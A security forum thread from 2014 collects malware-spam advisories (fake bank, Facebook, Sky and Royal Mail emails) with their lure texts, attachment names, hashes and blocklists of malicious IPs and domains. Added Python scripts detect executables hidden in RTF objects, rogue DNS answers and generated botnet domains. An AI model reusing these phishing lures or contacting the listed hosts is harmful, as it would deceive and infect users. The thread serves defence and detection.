27 March 2014 : Version 2 (HSBC) SecureMessage.zip (11kb) Extracts to SecureMessage.exe (24kb)
Current Virus total detections: 0/51*** MALWR Auto Analysis ****
This You have received a secure message is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/e7117359aca8db292b813092a2f4f6cf1a14a2967c8bcc5a5523cbe3ec0312a4/analysis/

** https://malwr.com/analysis/ZmFkZDRhNTE4NTZmNGFkZmE5NTkwZGQ5YzlhODQ1Zjg/

*** https://www.virustotal.com/en/file/ec97a63d19552d1af8e67be87dca7703172a9041e43aaeb00cbb0bfe7dfc3cbb/analysis/

**** https://malwr.com/analysis/NGI0NjVmYzYwMDU5NDBhYmJlNWMxNGRjMDVmYmMyZTQ/
___

Facebook You send new photo – fake PDF malware
- http://myonlinesecurity.co.uk/facebook-send-new-photo-fake-pdf-malware/
Mar 27, 2014 - "... pretending to be from Facebook is another one from the current Androm bot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. This campaign follows on from other similar attempts to infiltrate your computer using Facebook as a theme...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Facebook-You-send-new-photo.png

27 March 2014 DCIM_IMAGEForYou.rar (40kb) Extracts to DCIM_IMAGEForYou.scr
Current Virus total detections: 1/51* MALWR Auto Analysis**
This You send new photo is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7ae601f4e0e16024b613d5449023c77b12e7041f5fce78ef95d26d8636bc9404/analysis/

** https://malwr.com/analysis/ZWQyMjdkY2MwZDcwNGVlNWE1YzAxYjhjZWVlNTVjMmM/

:mad: :mad:

AplusWebMaster
2014-03-28, 13:52
FYI...

Fake Bank acct. security warning – fake PDF malware
- http://myonlinesecurity.co.uk/banking-account-security-warning-fake-pdf-malware/
28 Mar 2014 - "Banking account security warning pretending to come from FRAUD ALERT SYSTEM <k.cooper@ fraudalert .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Many of these bank themed emails are extremely difficult to distinguish from phishing scams. It is becoming very frequent that the same or almost identical emails are being used over and over. Sometimes they have a link to a -fake- website where they expect you to give them your details. Other times it contains a html file that they want you to -click- on and enter details. This time they have a -fake- pdf file that if you are unwise enough to open it would infect your computer and enroll it into the Zeus botnet...
Subjects seen:
Important: Unauthorized attempt to access your banking account
Banking account security warning
Attention! Your credit card is being used
Emails seen:
Dear Sir or Madam,
The banking security system has just registered an external attempt to use your credit card from an unknown location.
In view of the fact that the safety of the credit card account is in danger we strongly recommend you to use the emergency instructions given in the attachments.
To protect users from attacks and fraudulent activities coming from within the banking system itself we need your permission to start the investigation and adjust the security measurements. If the required steps won’t be completed the account will be temporarily suspended and will be available after visiting a local office.
Step-by-step instructions and emergency phone number are in attachments to the email.
Truly yours,
PCI DSS Chief officer
K. Cooper ...

28 March 2014 : Fraud alert document 778-1.zip (345kb) Extracts to Fraud alert document 778-1.exe
Current Virus total detections: 4/51* MALWR Auto Analysis**
This Banking account security warning is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/5bbafa530193c35a41fa41df1c507bdaf81e5ee02be4343f19dc42c7c7393c50/analysis/

** https://malwr.com/analysis/NjE0ZmFmMmNlNTgyNDYxODg3MjUzYjU5NjcyNTkyZTc/
___

Something evil on 192.95.44.0/27 (OVH Canada)
- http://blog.dynamoo.com/2014/03/something-evil-on-1929544027-ovh-canada.html
28 Mar 2014 - "192.95.44.0/27 (spotted by Frank Denis*) is another evil OVH Canada netblock which I assume belongs to their black hat customer r5x .org / Penziatki although now OVH seem to be masking the customer details. I can see the following active subdomains within this range, all of which can be assumed to be malicious...
(Long list of URLs at the dynamoo URL above.)
I recommend that you apply the following blocklist:
192.95.44.0/27
accruespecialiste .ru
reachprotectione .ru
reachmape .ru
acquireconnectionse .ru "
* https://twitter.com/jedisct1/status/449309681408684032
___

Sky .com SPAM leads to Gameover Zeus
- http://blog.dynamoo.com/2014/03/skycom-statement-of-account-spam-leads.html
28 Mar 2014 - "This -fake- Sky spam has a malicious attachment:
Date: Fri, 28 Mar 2014 07:16:43 -0300 [06:16:43 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for the February invoice as this is now due for
payment.
Regards,
Darrel ...

The attachment is a ZIP file which contains an executable Statement_03282014.exe (note that the date is encoded into the file). This has a VirusTotal detection rate of 8/51*. The Malwr analysis** shows several attempted network connections. Firstly there's a download of a configuration file from [donotclick]igsoa .net/Book/2803UKd.wer and then subsequently an attempted connection to aulbbiwslxpvvphxnjij .biz on 50.116.4.71 (a Linode IP which has been seen before) and a number of -other- autogenerated domains.
Recommended blocklist:
50.116.4.71
aulbbiwslxpvvphxnjij .biz
lpuoztsdsnvyxdyvwpnlzwg .com..."
(More domains listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/bc72dc6cd6adb3c145df9971104ce747f08d53cd00b0993dd22b84b64bf9312f/analysis/1396011158/

** https://malwr.com/analysis/N2ZkYWFiNWU1YWUwNGRlNGFmOGRmNTk1MGI3MTYwNDU/
___

New Man-in-the-Middle attacks leveraging rogue DNS
- http://atlas.arbor.net/briefs/index#-1333965473
27 Mar 2014
Elevated Severity
New Man-in-the-Middle attacks are manipulating DNS settings and posing as websites of over 70 different financial institutions in order to capture login credentials.
Source:
- http://blog.phishlabs.com/new-man-in-the-middle-attacks-leveraging-rogue-dns
Mar 26, '14 - "... new wave of "Man-in-the-Middle" (MitM) attacks targeting users of online banking and social media. Customers of more than 70 different financial institutions are being targeted. In these attacks, hackers use -spam- to deliver malware that changes DNS settings and installs a rogue Certificate Authority (CA). The DNS changes point to the hacker's clandestine DNS name server so that users are directed to proxy servers instead of legitimate sites... The browser displays the proper website name and displays the familiar security icon to indicate a trusted, secure connection. The hacker's proxy sits between the authorized user and the real website, capturing login credentials and injecting code into the browsing session. This allows the hacker to take total control of the user's account and carry out unauthorized banking transactions as well as other actions...
> http://blog.phishlabs.com/hs-fs/hub/326665/file-613453020-png/Images/New_MitM_Attack.png
The hacker initiates these attacks by using spam to deliver malware to victims via malicious attachments... these spam emails contain a message designed to entice the user to open an attached RTF (Rich Text Format) document. The document contains an OLE (Object Linking and Embedding) object which is actually an executable program file. This program is the malware which changes the DNS and Certificate Authority settings that allow the attack to be performed without any outward signs visible to the user.
> http://blog.phishlabs.com/hs-fs/hub/326665/file-604096624-png/Images/EXE_disguised_as_RTF.png
On many systems, double-clicking an embedded program will execute it. Cybercriminals may use tools to create specially crafted RTF document files that display a familiar data file icon and a caption in most popular word processing programs; thus hiding or obscuring clues to the executable nature of the object, such as the EXE filename extension... The malware embedded in the spammed documents is a backdoor RAT (Remote Administration Tool) with an initial payload containing instructions to change DNS and security settings when initialized. The file is a Win32 PE (Portable Executable) EXE file and is actually a compiled form of an AutoIt script. The AutoIt scripting tools used offer the option to obfuscate the compiled code, and the version used to produce this malware makes it more difficult to decompile or reverse engineer the resulting EXE file than earlier versions. Some but not all of the samples found have been run through a second "cryptor" to aid in evading detection by anti-malware tools... One of the first actions performed by the malware is changing the DNS settings on the infected user’s PC. The malware configures the PC to use the hacker's rogue DNS server... PhishLabs continues to monitor these attacks and is working with others to mitigate the threat."
___

CVE-2014-0322* integrating Exploit Kits
- http://atlas.arbor.net/briefs/index#1584606323
27 Mar 2014
Elevated Severity
The disclosed CVE-2014-0322 vulnerability affecting Internet Explorer 9 and 10 is now being integrated into exploit kits.
This follows previously observed patterns of 0-day exploit code first being developed and used by APT actors for specific targets, then later adapted by cyber criminals for use in exploit kits targeting a much wider range of users who have not yet applied security updates.
Source: http://malware.dontneedcoffee.com/2014/03/cve-2014-0322-integrating-exploit-kits.html

* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322 - 9.3 (HIGH)
Last revised: 03/16/2014

:fear: :mad:
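The PhishLabs write-up above describes the delivery: an RTF whose OLE object is really a Win32 executable. The script below is an added example (not code from PhishLabs, Arbor or the forum poster) showing how to pull the OLE1 stream out of the \objdata group, read the class name from the OLE1 object header, and look for a PE image inside the native data. The sample RTF and the "executable" in it are constructed; the payload is only an MZ/PE header stub.

```python
"""Detect executables embedded as OLE objects in RTF attachments.

Added example. The RTF, the Package object and the PE stub below are
constructed for the demonstration and are not real malware.
"""
import re
import struct

# {\*\objdata ...} carries the OLE1 stream as hex digits, often wrapped across lines.
_OBJDATA = re.compile(rb"\\objdata\b([^}]*)\}", re.S)
_NONHEX = re.compile(rb"[^0-9A-Fa-f]")


def extract_objdata(rtf: bytes):
    """Return the decoded OLE1 stream of every \\objdata group in the RTF."""
    streams = []
    for m in _OBJDATA.finditer(rtf):
        hexdata = _NONHEX.sub(b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # tolerate a truncated trailing nibble
        if hexdata:
            streams.append(bytes.fromhex(hexdata.decode("ascii")))
    return streams


def _lp_string(buf: bytes, off: int):
    """LengthPrefixedAnsiString: DWORD length (including NUL) followed by the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\0"), off + n


def parse_ole1(stream: bytes):
    """Parse the OLE1.0 ObjectHeader (MS-OLEDS 2.2.4): version, FormatID, ClassName,
    TopicName, ItemName; an EmbeddedObject (FormatID 2) is followed by NativeDataSize + NativeData."""
    _version, fmt = struct.unpack_from("<II", stream, 0)
    off = 8
    class_name, off = _lp_string(stream, off)
    _topic, off = _lp_string(stream, off)
    _item, off = _lp_string(stream, off)
    if fmt != 2:  # 3 = LinkedObject, which carries no native data
        return {"class_name": class_name.decode("latin-1"), "native": b""}
    (size,) = struct.unpack_from("<I", stream, off)
    off += 4
    return {"class_name": class_name.decode("latin-1"), "native": stream[off:off + size]}


def find_pe(data: bytes) -> int:
    """Offset of the first MZ header whose e_lfanew points at a 'PE\\0\\0' signature, else -1."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            sig = pos + e_lfanew
            if 0 < e_lfanew < len(data) and data[sig:sig + 4] == b"PE\0\0":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1


def scan_rtf(rtf: bytes):
    """One finding per embedded object: its OLE class and where (if anywhere) a PE image starts."""
    findings = []
    for stream in extract_objdata(rtf):
        try:
            obj = parse_ole1(stream)
        except struct.error:
            continue  # malformed header; a real gateway would quarantine rather than skip
        findings.append({"class_name": obj["class_name"], "pe_offset": find_pe(obj["native"])})
    return findings


# ---- constructed sample -------------------------------------------------------
def _lp(s: bytes) -> bytes:
    s += b"\0"
    return struct.pack("<I", len(s)) + s

# Minimal DOS header with e_lfanew (offset 0x3C) pointing at a PE signature at 0x40.
_PE_STUB = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16
# Packager-style native data: label, original path, flags, then the file bytes (assumed layout).
_PACKAGE_NATIVE = (b"\x02\x00" + b"invoice.pdf.exe\0" + b"C:\\tmp\\invoice.pdf.exe\0"
                   + b"\0\0\x03\0" + _PE_STUB)
_OLE1 = (struct.pack("<II", 0x0501, 2) + _lp(b"Package") + _lp(b"") + _lp(b"")
         + struct.pack("<I", len(_PACKAGE_NATIVE)) + _PACKAGE_NATIVE)
_HEX = _OLE1.hex().encode("ascii")
SAMPLE_RTF = (b"{\\rtf1\\ansi\\deff0\n{\\object\\objemb\\objw1000\\objh1000{\\*\\objclass Package}\n"
              b"{\\*\\objdata\n" + b"\n".join(_HEX[i:i + 64] for i in range(0, len(_HEX), 64))
              + b"\n}}\n\\par }")

if __name__ == "__main__":
    for f in scan_rtf(SAMPLE_RTF):
        print(f"class={f['class_name']!r} pe_offset={f['pe_offset']}")
```

A class name of Package with a PE image in the native data is the combination to block outright; the filename Word shows the user comes from the Package label, not from the payload, which is why the icon and caption can say "RTF" or "PDF" while the bytes say MZ.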

AplusWebMaster
2014-03-31, 15:23
FYI...

Android.MisoSMS - malware ...
- http://www.fireeye.com/blog/technical/malware-research/2014/03/android-misosms-its-back-now-with-xtea.html
Mar 31, 2014 - "FireEye labs recently found a more advanced variant of Android.MisoSMS, the SMS-stealing malware that we uncovered last December* — yet another sign of cybercriminals’ growing interest in hijacking mobile devices for surveillance and data theft. Like the original version of the malware, the new variant sends copies of users’ text messages to servers in China. But the newest rendition adds a few features that make it harder to detect, including a new disguise, encrypted transmissions, and command-and-control (CnC) communications that are handled natively rather than over email... The newest version of MisoSMS suggests that cyber attackers are increasingly eyeing mobile devices — and the valuable information they store — as targets. It also serves as a vivid reminder of how crucial protecting this threat vector is in today’s mobile environment."
* http://www.fireeye.com/blog/?p=4126
(More detail available at both fireeye URLs above.)
___

Who’s Behind the ‘BLS Weblearn’ Credit Card SCAM
- http://krebsonsecurity.com/2014/03/whos-behind-the-bls-weblearn-credit-card-scam/
Mar 31, 2014 - "A new rash of credit and debit card scams involving bogus sub-$15 charges and attributed to a company called “BLS Weblearn” is part of a prolific international scheme designed to fleece unwary consumers... At issue are a rash of phony charges levied against countless consumers for odd amounts — such as $10.37, or $12.96. When they appear on your statement, the charges generally reference a company in St. Julians, Malta such as BLS*Weblearn or PLI*Weblearn, and include a 1-888 number that may or may not work (the most common being 888-461-2032 and 888-210-6574)...
onlinelearningaccess .com, one of the fraudulent affiliate marketing schemes that powers these -bogus- micropayments:
> http://krebsonsecurity.com/wp-content/uploads/2014/03/onlinelearningaccess.png
... it appears that the payments are being processed by a company called BlueSnap, which variously lists its offices in Massachusetts, California, Israel, Malta and London. Oddly enough, the payment network behind the $9.84 scams that surfaced last year — Credorax — also lists offices in Massachusetts, Israel, London and Malta. And, just like with the $9.84 scam*, this latest micropayment fraud scheme involves an extremely flimsy-looking affiliate income model that seems merely designed for abuse. According to information from several banks contacted for this story, early versions of this scam (in which fraudulent transactions were listed on statements as PLI*WEBLEARN) leveraged pliblue .com, formerly associated with a company called Plimus, a processor that also lists offices in California and Israel (in addition to Ukraine)... If you see charges like these or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again. For more on this scam, check out these posts from DailyKos** and Consumerist***."
* http://krebsonsecurity.com/2014/01/deconstructing-the-9-84-credit-card-hustle/

** http://www.dailykos.com/story/2014/03/15/1284964/-Credit-card-fraud-warning

*** http://consumerist.com/2014/03/19/check-your-debit-credit-card-statements-for-bls-weblearn-scam-transactions/
___

Fake cclonline "Order Despatched" – fake doc malware
- http://myonlinesecurity.co.uk/cclonline-com-order-despatched-fake-doc-malware/
Mar 31, 2014 - "... pretending come from sales@ cclonline .com and to be a notification about a computer being despatched to you via DPD courier services is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses...
Dear ellie,
We are pleased to confirm that your order reference 1960096 has been despatched via Economy Courier. You will find the full details of your order and this delivery in the attached document. In a few hours, your consignment 0255417316 can be tracked through the DPD website by clicking the following link: www .dpd .co .uk/tracking/trackingSearch.do?search.searchType=1&search.consignmentNumber=0255417321
You may receive further information concerning your consignment direct from DPD via email and/or SMS
Should you have any queries regarding your purchase, our customer service staff will be pleased to assist. E-mail mailto:custservice@ cclonline .com or telephone 01274 471206.
Thank you for choosing CCL Computers.
Yours sincerely...

31 March 2014: DESPATCH_NOTE_B18E7F.zip (72kb) Extracts to disp_75464354787914325.doc.exe
Current Virus total detections: 2/51* . This cclonline .com – Order Despatched is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper doc file with a fake Bluetooth icon instead of the .exe file it really is..."
* https://www.virustotal.com/en/file/cbc255ecf6883a056e1ab3693ba2138df629f85bb8ebb19516706639d127892c/analysis/
___

ADP Benefit Election Spam
- http://threattrack.tumblr.com/post/81291999525/adp-benefit-election-spam
Mar 31, 2014 - "Subjects Seen:
Benefit Elections
Typical e-mail details:
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f55062c1e3da33207f1cdda206146ae1/tumblr_inline_n3b283sybc1r6pupn.png

Malicious File Name and MD5:
CBE_Form.zip (60770AD82549984031FD3615E180EC83)
CBE_Form.scr (20406804C43D11DA25ABC2714697EC59)

Tagged: ADP, Upatre
___

Google’s Public DNS intercepted in Turkey
- http://googleonlinesecurity.blogspot.com/2014/03/googles-public-dns-intercepted-in-turkey.html
Mar 29, 2014 - "We have received several credible reports and confirmed with our own research that Google’s Domain Name System (DNS) service has been intercepted by most Turkish ISPs (Internet Service Providers). A DNS server tells your computer the address of a server it’s looking for, in the same way that you might look up a phone number in a phone book. Google operates DNS servers because we believe that you should be able to quickly and securely make your way to whatever host you’re looking for... imagine if someone had changed out your phone book with another one, which looks pretty much the same as before, except that the listings for a few people showed the wrong phone number. That’s essentially what’s happened: Turkish ISPs have set up servers that masquerade as Google’s DNS service."

:mad: :fear:
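The rogue-DNS MitM in the PhishLabs item (previous post) and the ISP interception of Google Public DNS in Turkey (above) have the same observable symptom: the resolver a host actually uses answers differently from the authoritative data, and in the MitM case many unrelated bank hostnames collapse onto one proxy address. The check below is an added example (not from PhishLabs, Arbor, Google or the forum poster). The resolvers are injectable callables so it runs offline on constructed answers using documentation address ranges; lookup_system shows how the live OS resolver would be wired in.

```python
"""Compare the system resolver's answers against a trusted reference resolver.

Added example. REFERENCE/TAMPERED are constructed answer sets (RFC 5737
documentation addresses); the hostnames are placeholders, not real banks.
"""
import socket


def lookup_system(host: str) -> set:
    """Live A-record lookup through whatever resolver the OS is configured with (needs network)."""
    return {ai[4][0] for ai in socket.getaddrinfo(host, None, socket.AF_INET)}


def check_resolvers(hosts, system_resolve, reference_resolve, collapse_threshold=3):
    """Return hosts whose system answers contain addresses the reference never returned,
    and any single address that several unrelated hosts collapse onto (a proxy tell-tale)."""
    divergent = {}
    by_address = {}
    for host in hosts:
        sys_ips = set(system_resolve(host))
        ref_ips = set(reference_resolve(host))
        unexpected = sys_ips - ref_ips
        if unexpected:
            divergent[host] = sorted(unexpected)
        for ip in sys_ips:
            by_address.setdefault(ip, set()).add(host)
    collapsed = {ip: sorted(h) for ip, h in by_address.items() if len(h) >= collapse_threshold}
    return {"divergent": divergent, "collapsed": collapsed}


# ---- constructed data ---------------------------------------------------------
REFERENCE = {
    "bank-a.example": {"203.0.113.10"},
    "bank-b.example": {"203.0.113.20", "203.0.113.21"},
    "bank-c.example": {"203.0.113.30"},
    "social.example": {"203.0.113.40"},
    "news.example": {"203.0.113.50"},
}
PROXY = "198.51.100.7"  # the attacker's proxy; everything "interesting" is pointed here
TAMPERED = {h: (ips if h == "news.example" else {PROXY}) for h, ips in REFERENCE.items()}


def reference_resolve(host):
    return REFERENCE.get(host, set())


def tampered_resolve(host):
    return TAMPERED.get(host, set())


if __name__ == "__main__":
    report = check_resolvers(REFERENCE, tampered_resolve, reference_resolve)
    for host, ips in report["divergent"].items():
        print(f"{host}: unexpected answer(s) {ips}")
    for ip, hosts in report["collapsed"].items():
        print(f"{ip} is the answer for {len(hosts)} unrelated hosts: {hosts}")
```

Two caveats a practitioner should keep in mind. CDN and geo-aware zones legitimately return different addresses to different vantage points, so "divergent" alone will produce noise; take the reference from a resolver you control (or over a TLS/HTTPS transport an on-path ISP cannot silently rewrite) and weight the "collapsed" signal, which a DNS-based MitM cannot avoid producing. And DNS is only half of this attack: the malware also installs a rogue CA so the proxied HTTPS session shows a valid padlock, so the same host check should be paired with an inventory of the trusted root store (on Windows, `certutil -store Root` lists it) against a known-good baseline.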

AplusWebMaster
2014-04-01, 14:10
FYI...

Something evil on 64.202.116.124
- http://blog.dynamoo.com/2014/04/something-evil-on-64202116124.html
1 Apr, 2014 - "64.202.116.124 (HostForWeb, US) is currently hosting exploit kits (see this example*). I recommend that you block traffic to this IP or the domains listed in this pastebin**. Most of the domains listed are dynamic DNS ones. If you block all such domains in that list it is nice and manageable:

in .ua
myftp .org
sytes .net
hopto .org
no-ip .biz
myvnc .com
sytes .net
no-ip .info
tobaccopeople .com "
* http://urlquery.net/report.php?id=1396348899312

** http://pastebin.com/Pq4kDit6

- https://www.virustotal.com/en/ip-address/64.202.116.124/information/
___

Fake message from your attorney - PDF malware
- http://myonlinesecurity.co.uk/message-attorney-fake-pdf-malware/
1 April 2014 - "... pretending to be from your neighbour is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. This one also has a rootkit component so the malware it downloads & runs, attempts to stay hidden on your computer...
Hi, there!
This is your neighbor writing here. Today your attorney popped you, but you were out, so he left a message for you.
I have attached the file in this email, so you can open and check everything you need.
Your attorney told me it is quite urgent and as soon as you check this message you should call him back.
If something is not clear, you can find the cell phone number of your attorney into the file, so you can dial it at once...

1 April 2014 please call me back asap.zip (346kb) Extracts to please call me back asap.exe
Current Virus total detections: 6/51*. This message from your attorney is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a68098d5359236a72937af1649d2a86cd5aaef5be7a125c2c4fa377906c36e81/analysis/
___

Fake rbs .com "RE: Copy" SPAM
- http://blog.dynamoo.com/2014/04/rbscom-re-copy-spam.html
1 Apr 2014 - "This very terse spam has a malicious attachment:
Date: 1 Apr 2014 14:25:39 GMT [10:25:39 EDT]
From: Kathryn Daley [Kathryn.Daley@ rbs .com]
Subject: RE: Copy
(Copy-01042014)

The attachment is Copy-04012014.zip which in turn contains a malicious executable Copy-04012014.scr which has a VirusTotal detection rate of just 3/50*. The Malwr analysis** shows that it has the characteristics of P2P/Gameover Zeus and it makes several network connections starting with a download of a configuration file from: [donotclick]photovolt .ro/script/0104UKd.bis . The malware then tries to contact a number of other domains. I recommend using the following blocklist:
50.116.4.71
photovolt .ro
aulbbiwslxpvvphxnjij .biz ..."
(More listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/72a641424b6754a44f1885c4413798d71b8c411290daf6d94ffb803619c55a11/analysis/1396353996/

** https://malwr.com/analysis/MWY4M2M3Y2FjMGM2NGVmZGE5YTUwZTJjMDhlYmM3ZmY/
___

Royal Mail Lost Package Spam
- http://threattrack.tumblr.com/post/81388009110/royal-mail-lost-package-spam
Apr 1, 2014 - "Subjects Seen:
Failure to deliver
Typical e-mail details:
Dear <email address>
Royal Mail has detained your package #98159-5424.Unfortunately some important information is missing to complete the delivery.
Please fulfil the documents attached, and send it back to: onlinepostage@ royalmail.com
The RM International Mail Branch holding will notify you of the reason for detention .

Malicious File Name and MD5:
rm_332009105C.zip (AB0041BC7687AE92E378B145663519C5)
Deliery_info_7383461243.pdf.exe (3F54A5BBAD1B63263135DC97037447E1)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/27ef52933a52bcd283eb53473041685b/tumblr_inline_n3cu66TITU1r6pupn.png
___

Bogus email “ACH failed...” - trojan in .scr format
- http://blog.mxlab.eu/2014/03/31/email-ach-failed-due-to-system-failure-contains-attached-trojan-in-scr-format/
Mar 31, 2014 - "... new trojan distribution campaign by email with the subject “ACH failed due to system failure”... has the following body:
ACH PAYMENT CANCELLED
The ACH Transfer (ID: 87052955198926), recently submitted from your savings account (by you or any other person), was CANCELLED by other financial institution.
Rejection Reason: See details in the acttached report.
Transfer Report: report_87052955198926.pdf (Adobe Reader PDF)
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2014 NACHA – The Electronic Payments Association

The attached ZIP file has the name report_87052955198926.zip and contains the 19 kB large file report_28740088654298.scr. The trojan is known as W32/Trojan.MNWL-4927 or TROJ_GEN.F0D1H00CV14. At the time of writing, 3 of the 48 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 1ab76103d28fda1ed11d2019e7c47df3d57401aee43e7df785b057853f9c1f52 "
* https://www.virustotal.com/en/file/1ab76103d28fda1ed11d2019e7c47df3d57401aee43e7df785b057853f9c1f52/analysis/

** https://malwr.com/analysis/OTg5MWRiNTM5ODk4NDU0Y2E3ZDc5NGYzYjgzNzUyMGM/

:fear: :mad:
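Both the Sky.com "Statement of account" item (previous post) and the rbs.com "RE: Copy" item above end with Gameover Zeus contacting "a number of autogenerated domains" alongside the ordinary-looking hosts that serve its configuration file. The script below is an added example (not from dynamoo or the forum poster) of a cheap lexical triage for such DGA-style names run over resolver log lines. The log lines are constructed; the two generated names in them are the ones quoted in the posts. The registrable-label logic is a deliberate simplification (second-level label, no public-suffix list), and the thresholds are assumptions to tune against your own traffic.

```python
"""Flag DGA-looking query names in DNS logs by label length, vowel ratio and consonant runs.

Added example. SAMPLE_LOG is constructed; thresholds are assumptions.
"""
import re

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]+")  # y is treated as a consonant
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qtype>\S+)\s+(?P<qname>\S+)")


def registrable_label(domain: str) -> str:
    """Second-level label. Stand-in for a public-suffix lookup (assumption: no co.uk handling)."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def label_features(label: str) -> dict:
    vowels = sum(c in VOWELS for c in label)
    runs = [len(r) for r in CONSONANT_RUN.findall(label)]
    return {
        "length": len(label),
        "vowel_ratio": vowels / len(label) if label else 0.0,
        "max_consonant_run": max(runs, default=0),
    }


def is_dga_like(domain: str, min_len=12, max_vowel_ratio=0.30, min_run=5) -> bool:
    """Long label, vowel-poor, with an unpronounceable consonant run: all three must hold."""
    f = label_features(registrable_label(domain))
    return (f["length"] >= min_len
            and f["vowel_ratio"] <= max_vowel_ratio
            and f["max_consonant_run"] >= min_run)


def flag_dga_queries(lines):
    """(client, qname) for every log line whose query name trips the heuristic."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_dga_like(m["qname"]):
            hits.append((m["client"], m["qname"].rstrip(".")))
    return hits


# Constructed resolver log in a simple "timestamp client query TYPE name" layout.
SAMPLE_LOG = """\
2014-03-28T10:16:43Z 10.0.0.15 query A igsoa.net.
2014-03-28T10:16:44Z 10.0.0.15 query A aulbbiwslxpvvphxnjij.biz.
2014-03-28T10:16:44Z 10.0.0.15 query A lpuoztsdsnvyxdyvwpnlzwg.com.
2014-04-01T14:26:01Z 10.0.0.22 query A photovolt.ro.
2014-04-01T14:26:02Z 10.0.0.22 query A aulbbiwslxpvvphxnjij.biz.
2014-04-01T14:26:05Z 10.0.0.22 query A www.dpd.co.uk.
""".splitlines()

if __name__ == "__main__":
    for client, name in flag_dga_queries(SAMPLE_LOG):
        print(f"{client} -> {name}  {label_features(registrable_label(name))}")
```

Note what the heuristic does not catch: igsoa .net and photovolt .ro, the hosts the samples fetch their configuration from, look like ordinary domains and pass every test. Those still have to come from the published blocklist; the lexical check only helps with the generated C2 names, which is exactly where a static blocklist falls behind.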

AplusWebMaster
2014-04-02, 16:57
FYI...

Something evil on 66.96.223.204
- http://blog.dynamoo.com/2014/04/something-evil-on-6696223204.html
2 Apr 2014 - "66.96.223.204 (Network Operations Center, US) appears to be hosting some sort of malicious redirectors being used in current malware campaigns. VirusTotal gives a snapshot of the badness*.
* https://www.virustotal.com/en-gb/ip-address/66.96.223.204/information/
Recommended blocklist:
66.96.223.204 ..."
(More URLs listed at the dynamoo URL above.)
___

Something evil on 213.229.69.41
- http://blog.dynamoo.com/2014/04/something-evil-on-2132296941.html
2 Apr 2014 - "This tweet by Malmouse* got me investigating what was happening on 213.229.69.41.. and the answer is that it appears to be unmitigated badness. First of all, these domains are either currently or recently hosted on 213.229.69.41, or are associated with it in some way... VirusTotal gives a good overview of the badness on this IP**.
** https://www.virustotal.com/en-gb/ip-address/213.229.69.41/information/
... All these domains appear to be recently registered with the exception of gfthost .com which has ns1.gfthost .com and ns2.gfthost .com hosted on the same IP. Both those nameservers are used exclusively for these malware domains, so there must be some sort of connection... I recommend that you -block- 213.229.69.41 (Simply Transit, UK) ..."
* https://twitter.com/malm0u53/status/451299152316882944
___

Fake Facebook emails lead to Upatre Malware
- http://blog.malwarebytes.org/security-threat/2014/04/fake-facebook-notification-emails-lead-to-upatre-malware/
Apr 2, 2014 - "... SPAM messages in circulation bearing the message “Some men commented on your status”... Here’s the spam message currently landing in mailboxes, which looks like a Facebook notification:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/fbcute1.jpg
... The -clickable- link leads to a Dropbox page which is currently offline. The Malware involved in this particular spam run claims to be a PDF file:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/fbspam2.jpg
